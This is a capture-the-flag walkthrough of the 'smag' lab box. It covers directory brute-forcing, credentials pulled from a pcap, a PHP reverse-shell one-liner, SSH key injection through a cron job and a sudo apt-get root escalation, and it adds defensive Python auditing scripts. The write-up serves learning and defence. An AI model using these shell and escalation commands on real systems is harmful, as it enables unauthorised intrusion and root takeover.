Do you remember how to analyse packets?

This is an easy-rated box. Let’s begin.


nmap says we’ve got 22 (SSH) and 80 (HTTP) only.


There’s not much on the home page for the website, so we’ll run a quick gobuster:

root@kali:/opt/tryhackme/smag# gobuster dir -u -w /usr/share/dirb/wordlists/common.txt

This turns up one interesting directory: mail. Checking that, we get a message about a packet capture along with a download link. It says you have to download it with wget, although I’m sure that’s not actually necessary. Let’s do it anyway:

root@kali:/opt/tryhackme/smag# wget
--2020-07-31 03:52:52--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 1209 (1.2K) [application/vnd.tcpdump.pcap]
Saving to: ‘dHJhY2Uy.pcap’

dHJhY2Uy.pcap                        100%[====================================================================>]   1.18K  --.-KB/s    in 0s      

2020-07-31 03:52:53 (29.8 MB/s) - ‘dHJhY2Uy.pcap’ saved [1209/1209]


We can open the packet capture in Wireshark and it’s very straightforward: we find a POST request with some important details, namely a new subdomain:


and some credentials: helpdesk:REDACTED

We add development.smag.thm to our /etc/hosts and continue.
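For the ‘analyse packets’ part, here is an added example (my code, not from the write-up or the room) that does in stdlib Python what was done by eye in Wireshark above: it walks a classic pcap, lifts HTTP requests out of the TCP payloads and reports the Host, path and form fields of any login POST, masking the password. The capture it reads is constructed in memory: the host development.smag.thm, the path /login.php and the username helpdesk come from the write-up, the password value is the placeholder REDACTED, and the IP addresses, ports and function names are my own.

```python
"""Pull cleartext form logins out of a classic pcap using only the standard library.

Added example, not part of the original write-up. A constructed pcap (one
Ethernet/IPv4/TCP frame carrying an HTTP POST) is built in memory and walked
with a minimal pcap/Ethernet/IPv4/TCP parser; password values are masked in
the report, which is what you want from a detection job rather than a CTF tool.
"""
import struct
from urllib.parse import parse_qs

PCAP_MAGIC = 0xA1B2C3D4          # classic pcap, microsecond timestamps
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
HTTP_METHODS = (b"POST ", b"GET ", b"PUT ")
SECRET_WORDS = ("pass", "pwd", "secret")
USER_FIELDS = ("username", "user", "login", "email")


def build_sample_pcap(host: bytes, path: bytes, body: bytes) -> bytes:
    """Constructed sample capture: a single frame with an HTTP POST (client -> server:80)."""
    http = (b"POST " + path + b" HTTP/1.1\r\nHost: " + host +
            b"\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: " +
            str(len(body)).encode() + b"\r\n\r\n" + body)
    # TCP: ports, seq, ack, data offset 5 words, flags PSH|ACK, window, checksum, urgent
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(http), 1, 0, 64,
                     IPPROTO_TCP, 0, bytes([10, 0, 0, 2]), bytes([10, 0, 0, 1]))
    eth = b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4)
    frame = eth + ip + tcp + http
    global_hdr = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    record_hdr = struct.pack("<IIII", 0, 0, len(frame), len(frame))
    return global_hdr + record_hdr + frame


def iter_frames(pcap: bytes):
    """Yield the captured bytes of every record in a classic (non-pcapng) pcap."""
    magic = struct.unpack("<I", pcap[:4])[0]
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:        # same magic, file written big-endian
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    if struct.unpack(endian + "I", pcap[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled")
    off = 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack(endian + "IIII", pcap[off:off + 16])[2]
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len


def tcp_payload(frame: bytes):
    """Return the TCP payload of an Ethernet/IPv4/TCP frame, or None for anything else."""
    if len(frame) < 54 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = 14
    if frame[ip + 9] != IPPROTO_TCP:
        return None
    ihl = (frame[ip] & 0x0F) * 4
    total_len = struct.unpack("!H", frame[ip + 2:ip + 4])[0]
    tcp = ip + ihl
    data_off = (frame[tcp + 12] >> 4) * 4
    return frame[tcp + data_off:ip + total_len]   # bounded by IP length, not frame padding


def find_form_logins(pcap: bytes) -> list:
    """Report HTTP requests whose urlencoded body contains a password-like field."""
    findings = []
    for frame in iter_frames(pcap):
        payload = tcp_payload(frame)
        if not payload or not payload.startswith(HTTP_METHODS):
            continue
        head, _, body = payload.partition(b"\r\n\r\n")
        request_line, *header_lines = head.split(b"\r\n")
        method, path, _ = request_line.split(b" ", 2)
        headers = {}
        for line in header_lines:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        fields = parse_qs(body.decode("latin-1"), keep_blank_values=True)
        secrets = [k for k in fields if any(w in k.lower() for w in SECRET_WORDS)]
        if not secrets:
            continue
        findings.append({
            "method": method.decode("latin-1"),
            "host": headers.get(b"host", b"").decode("latin-1"),
            "path": path.decode("latin-1"),
            "username": next((fields[k][0] for k in fields if k.lower() in USER_FIELDS), None),
            "masked": {k: "*" * len(fields[k][0]) for k in secrets},
        })
    return findings


# Constructed input: host and path as named in the write-up, password is a placeholder.
SAMPLE_PCAP = build_sample_pcap(b"development.smag.thm", b"/login.php",
                                b"username=helpdesk&password=REDACTED")

if __name__ == "__main__":
    for f in find_form_logins(SAMPLE_PCAP):
        print(f"{f['method']} http://{f['host']}{f['path']} user={f['username']} fields={f['masked']}")
```

To run it over a real capture, pass `open(path, "rb").read()` to `find_form_logins`. It only understands classic pcap over Ethernet and requests that fit in one TCP segment, which is enough to confirm that a site is sending credentials in the clear; the server-side fix is TLS on the login page, and the same check run over a mirror port makes a cheap cleartext-login detector.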


Once we go to development.smag.thm/login.php and authenticate, we get a page that says ‘enter a command’. Any number of commands can be tried but none of them appear to do anything... until you start a listener and try a reverse shell:

php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Thanks, pentestmonkey.

On the box

As usual I run linpeas; this time we find a cron job:

root /bin/cat /opt/.backups/ > /home/jake/.ssh/authorized_keys

So the job is copying jake’s public key to the authorized keys file. Good to know.
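The weakness here is not the cron job itself but that a file root reads straight into authorized_keys can be changed by other users. As an added check (my code, not part of the write-up), the script below parses system crontab lines, picks out the absolute paths each command reads, and reports any that are world-writable, owned by an untrusted uid, or kept in a world-writable directory without the sticky bit. The backup file name keys.bak and the temporary directory are constructed placeholders, since the write-up elides the real file name.

```python
"""Audit cron jobs for input files that someone other than the job's user can change.

Added example, not from the write-up. A job that runs as root and copies a
file from /opt/.backups into a user's authorized_keys hands control of that
account to whoever can write the source file. This checker reads system
crontab lines (with the user field), extracts the absolute paths the command
reads, and flags the ones other users could alter. File names are constructed.
"""
import os
import stat
import tempfile


def input_paths(command: str) -> list:
    """Absolute paths the command reads; redirection targets (> / >>) are outputs and skipped."""
    paths, skip_next = [], False
    for tok in command.split():
        if tok in (">", ">>"):
            skip_next = True
            continue
        if skip_next or tok.startswith(">"):
            skip_next = False
            continue
        if tok.startswith("/"):
            paths.append(tok)
    return paths


def check_path(path: str, trusted_uids) -> list:
    """Findings for one file: who besides the job's user could alter what it reads."""
    findings = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [(path, "does not exist: a writable parent would let anyone create it")]
    if st.st_mode & stat.S_IWOTH:
        findings.append((path, "world-writable"))
    if st.st_uid not in trusted_uids:
        findings.append((path, f"owned by untrusted uid {st.st_uid}"))
    parent = os.stat(os.path.dirname(path) or "/")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        findings.append((path, "parent directory world-writable without sticky bit"))
    return findings


def audit_crontab(lines, trusted_uids=frozenset({0})) -> list:
    """Run check_path over every input of every job; returns (job_user, path, reason) tuples."""
    findings = []
    for line in lines:
        parts = line.split()
        if not parts or parts[0].startswith("#") or len(parts) < 7:
            continue
        user, command = parts[5], " ".join(parts[6:])
        for path in input_paths(command):
            findings.extend((user, p, why) for p, why in check_path(path, trusted_uids))
    return findings


def demo() -> list:
    """Constructed scenario: one world-writable backup file next to one that is not."""
    with tempfile.TemporaryDirectory() as tmp:
        loose, clean = os.path.join(tmp, "keys.bak"), os.path.join(tmp, "clean.bak")
        for p, mode in ((loose, 0o666), (clean, 0o644)):
            open(p, "w").close()
            os.chmod(p, mode)
        crontab = [
            "# m h dom mon dow user command",
            f"* * * * * root /bin/cat {loose} > {tmp}/authorized_keys",
            f"* * * * * root /bin/cat {clean} >> {tmp}/authorized_keys",
        ]
        # Root and the current user are treated as trusted so only the mode bits decide.
        return audit_crontab(crontab, trusted_uids={0, os.getuid()})


if __name__ == "__main__":
    for user, path, why in demo():
        print(f"[{user}] {path}: {why}")
```

Point `audit_crontab` at the lines of /etc/crontab and /etc/cron.d/* on a real host (leaving the default trusted uid of root). The fix for a job like this one is the usual pair: make the source file and its directory root-owned and not group- or world-writable, and have the job fail closed rather than overwrite authorized_keys when that check does not hold.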


Let’s generate a new SSH key with ssh-keygen:

root@kali:/opt/tryhackme/smag# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa

Once that’s done (with the passphrase ‘yolo’), we can get it onto the box, append it to the file and wait for the cron job to run.

--2020-07-31 04:17:32--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 563 [application/octet-stream]
Saving to: ''          100%[===================>]     563  --.-KB/s    in 0s      

2020-07-31 04:17:33 (106 MB/s) - '' saved [563/563]
www-data@smag:/dev/shm$ /bin/cat >> /opt/.backups/


Now we can login as jake with our passphrase:

root@kali:/opt/tryhackme/smag# ssh -i id_rsa jake@smag.thm

Running sudo -l gives us this:

jake@smag:~$ sudo -l
Matching Defaults entries for jake on smag:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on smag:
    (ALL : ALL) NOPASSWD: /usr/bin/apt-get

And GTFOBins does the rest:

jake@smag:~$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
# whoami
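As an added example (my code, not from the write-up or GTFOBins), here is the check an auditor would run over that sudo -l output, together with a small model of sudoers argument matching that shows why a rule of `/usr/bin/apt-get update` would not have matched the invocation above. The names parse_sudo_entry, sudoers_matches and audit_sudo_entry are mine; wildcards and Cmnd_Alias expansion are not modelled.

```python
"""Audit a sudoers entry and show why restricting arguments closes this hole.

Added example, not from the write-up. parse_sudo_entry() reads one line of
`sudo -l` output such as "(ALL : ALL) NOPASSWD: /usr/bin/apt-get";
sudoers_matches() mimics sudo's command matching: a bare path allows any
arguments, a path followed by arguments requires exactly that argument list,
and a path followed by "" allows no arguments at all. Wildcards and command
aliases are deliberately left out.
"""
import shlex


def parse_sudo_entry(entry: str) -> dict:
    """Split '(runas) TAG: TAG: command args' into runas, tags and command."""
    runas, _, rest = entry.strip().partition(")")
    runas = runas.lstrip("(").strip()
    tags, rest = [], rest.strip()
    while True:
        tok, _, remainder = rest.partition(" ")
        if tok.endswith(":") and tok[:-1].isupper():
            tags.append(tok[:-1])
            rest = remainder.strip()
        else:
            return {"runas": runas, "tags": tags, "command": rest}


def sudoers_matches(rule_command: str, argv: list) -> bool:
    """True if sudo would allow argv (argv[0] already a full path) under this rule command."""
    rule = shlex.split(rule_command)
    if not argv or argv[0] != rule[0]:
        return False
    if len(rule) == 1:             # bare path: any arguments allowed
        return True
    if rule[1:] == [""]:           # path followed by "": no arguments allowed
        return len(argv) == 1
    return argv[1:] == rule[1:]    # explicit arguments must match exactly


def audit_sudo_entry(entry: str) -> list:
    """Findings for one entry: no password prompt, and no argument restriction."""
    e = parse_sudo_entry(entry)
    findings = []
    if "NOPASSWD" in e["tags"]:
        findings.append("NOPASSWD: no authentication before the command runs")
    if len(shlex.split(e["command"])) == 1:
        findings.append("no argument restriction: any option the binary accepts is allowed")
    return findings


if __name__ == "__main__":
    loose = "(ALL : ALL) NOPASSWD: /usr/bin/apt-get"
    tight = "(ALL : ALL) NOPASSWD: /usr/bin/apt-get update"
    # The invocation from the write-up, as sudo would see it after path resolution.
    hooked = shlex.split("/usr/bin/apt-get update -o APT::Update::Pre-Invoke::=/bin/sh")
    print(loose, audit_sudo_entry(loose))
    print(tight, audit_sudo_entry(tight))
    print("hooked update under loose rule:", sudoers_matches(parse_sudo_entry(loose)["command"], hooked))
    print("hooked update under tight rule:", sudoers_matches(parse_sudo_entry(tight)["command"], hooked))
```

Real sudo also canonicalises the binary path and honours wildcards, so treat `sudoers_matches` as a teaching model rather than an authority: after tightening a rule, confirm the result with `sudo -l -U jake` on the box. The more general lesson from this entry is that an unrestricted NOPASSWD rule for any binary with option hooks is equivalent to a root shell for that user.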